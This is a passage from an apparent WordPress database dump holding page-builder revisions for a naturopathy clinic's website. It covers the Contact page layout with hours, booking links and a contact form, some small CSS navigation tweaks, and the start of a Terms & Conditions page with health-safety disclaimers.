transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_padding=\"80px|50px|||false|false\" custom_padding_tablet=\"50px|0px|||false|false\" custom_padding_phone=\"\" custom_padding_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"-60px\" box_shadow_vertical=\"0px\" box_shadow_color=\"#ffffff\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\'; \">hello@verdenaturopathy.com.au</span><span style=\"font-family: \'Playfair Display\'; font-size: x-large;\"></span></span></h3>\n<span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></h3>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat;\"></span><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed/Thurs: 9am-5pm</span>\n<span style=\"font-family: Montserrat; color: #666666;\">Alternate Saturdays: 9am-1pm</span></h3>\n<span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong></strong></span>\n\n<span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"></span>\n\n<span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location:</span>\n\n<span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span><span style=\"font-family: Montserrat; font-size: large;\"></span>\n\n<span style=\"font-family: Montserrat; font-size: large;\"></span>\n\n [/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2021-05-27 21:33:34','2021-05-27 13:33:34','',26,'https://verdenaturopathy.com.au/?p=266',0,'revision','',0),(219,1,'2021-05-27 13:27:20','2021-05-27 05:27:20','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"224px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"560px\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" min_height=\"665px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_padding=\"80px|50px|||false|false\" custom_padding_tablet=\"50px|0px|||false|false\" custom_padding_phone=\"\" custom_padding_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"-60px\" box_shadow_vertical=\"0px\" box_shadow_color=\"#ffffff\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\'; \">hello@verdenaturopathy.com.au</span><span style=\"font-family: \'Playfair Display\'; font-size: x-large;\"></span></span></h3>\n<span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></h3>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat;\"></span><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed/Thurs: 9am-5pm</span>\n<span style=\"font-family: Montserrat; color: #666666;\">Alternate Saturdays: 9am-1pm</span></h3>\n<span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong></strong></span>\n\n<span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"></span>\n\n<span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location:</span>\n\n<span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span><span style=\"font-family: Montserrat; font-size: large;\"></span>\n\n<span style=\"font-family: Montserrat; font-size: large;\"></span>\n\n [/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verde-health.au2.cliniko.com/bookings?business_id=430041870630918322&practitioner_id=430041868173056552\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2021-05-27 13:27:20','2021-05-27 05:27:20','',26,'https://verdenaturopathy.com.au/?p=219',0,'revision','',0),(229,1,'2021-05-27 20:23:02','2021-05-27 12:23:02','@media screen and (min-width: 1040px) {\n #et-top-navigation {\n display: inline-block!important;\n float: right!important;\n \n }\n}','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-27 20:23:02','2021-05-27 12:23:02','',84,'https://verdenaturopathy.com.au/?p=229',0,'revision','',0),(232,1,'2021-05-27 20:27:12','2021-05-27 12:27:12','@media screen and (min-width: 1040px) {\n #et-top-navigation {\n display: inline-block!important;\n \n \n }\n}','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-27 20:27:12','2021-05-27 12:27:12','',84,'https://verdenaturopathy.com.au/?p=232',0,'revision','',0),(234,1,'2021-05-27 20:33:43','2021-05-27 12:33:43','@media screen and (min-width: 1040px) {\n #et-top-navigation {\n display: inline-block!important;\n float:none;\n \n \n }\n}','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-27 20:33:43','2021-05-27 12:33:43','',84,'https://verdenaturopathy.com.au/?p=234',0,'revision','',0),(238,1,'2021-05-27 20:44:57','2021-05-27 12:44:57','@media screen and (min-width: 1040px) {\n #et-top-navigation {\n padding-left: 400px;\n float:none;\n \n \n }\n}','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-27 20:44:57','2021-05-27 12:44:57','',84,'https://verdenaturopathy.com.au/?p=238',0,'revision','',0),(240,1,'2021-05-27 20:53:10','2021-05-27 12:53:10','@media screen and (min-width: 1040px) {\n #et-top-navigation {\n padding-left: 400px!important;\n float:none;\n \n \n }\n}','Divi','','inherit','closed','closed','','84-revision-v1','','','2021-05-27 20:53:10','2021-05-27 12:53:10','',84,'https://verdenaturopathy.com.au/?p=240',0,'revision','',0),(221,1,'2021-05-27 13:32:52','2021-05-27 05:32:52','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\"][et_pb_row _builder_version=\"4.9.4\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.9.4\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" inline_fonts=\"Playfair Display SC,Playfair Display,Montserrat\"]<!-- divi:paragraph -->\n<h1 style=\"text-align: center;\"><span style=\"font-family: \'Playfair Display SC\';\"><strong>Terms & Conditions</strong></span></h1>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\">Please be aware that any information we provide on this website, in blogs and in downloadable resources is general advice only. This information may not apply or could potentially be harmful to people in specific circumstances, so please seek medical advice before acting on this information to ensure your own safety, particularly if you have a medical condition or take any medications. There is no professional relationship formed unless you explicitly choose to work with us by purchasing our services or products.</span></p>\n<p><span style=\"font-family: Montserrat;\">Your health and safety are important to us. We expect you to use common sense when accessing the information on or downloaded from this website. Please contact us if you have any doubts or questions about the suitability of any general, nutritional, herbal or lifestyle advice provided on this website.</span></p>\n<p> </p>\n<h2><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\" font-family:=\"\" playfair=\"\" display=\"\" sc=\"\">Our Responsibility</span></strong></span></h2>\n<p><span style=\"font-family: Montserrat;\">Melissa Cann is a fully-qualified naturopath holding a Bachelor’s degree in Health Science (Naturopathy). This allows her to provide naturopathic services and dispense practitioner-only products. Naturopaths provide consultations which include thorough case-taking, physical examinations and the dispensing of products. Treatment plans may include natural remedies such as liquid herbs, flower essences, herbal infusions/teas, herbal creams and supplements, as well as dietary advice and meal planning, and lifestyle recommendations.</span></p>\n<p> </p>\n<h3><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\">Your responsibility</span></strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Your health & safety is our priority & therefore we ask that you fill out a <u>Client Intake Form</u> prior to treatment. All information you provide will be confidential. Failure to complete this form will result in our inability to treat you in the interest of your health & safety. The information gathered during a medical history will assist in establishing this and developing the best treatment plan for you. </span></p>\n<p><span style=\"font-family: Montserrat;\">During a consult, we will discuss your presenting complaint and health history in order to make the safest and most effective treatment plan for you. To get a thorough picture, we require lots of information regarding symptoms, illnesses, body systems and processes, mental health, current living situation and family history. Current medications and supplements must be disclosed so as to ensure no interactions will occur between what we prescribe and what you are currently taking.</span></p>\n<p><span style=\"font-family: Montserrat;\">It is your responsibility to inform us of any changes in your health status throughout your future treatments with us.</span></p>\n<p><span style=\"font-family: Montserrat;\">Please notify us immediately if you experience any worsening of symptoms or any unpleasant or unwanted side effects or reactions after commencing each new or recurring herbal medicine liquid, supplement or other treatment. Reactions may indicate a sensitivity or allergy to a herb so it is your responsibility to notify us immediately so we can rectify the issue. If a severe reaction occurs, please cease taking the prescribed remedy and seek medical advice immediately.</span></p>\n<p><span style=\"font-family: Montserrat;\">If you feel you have not provided accurate information during the consult, please contact us directly to rectify. Incorrect personal/health information provided may impact your treatment success and/or personal safety.</span></p>\n<p><span 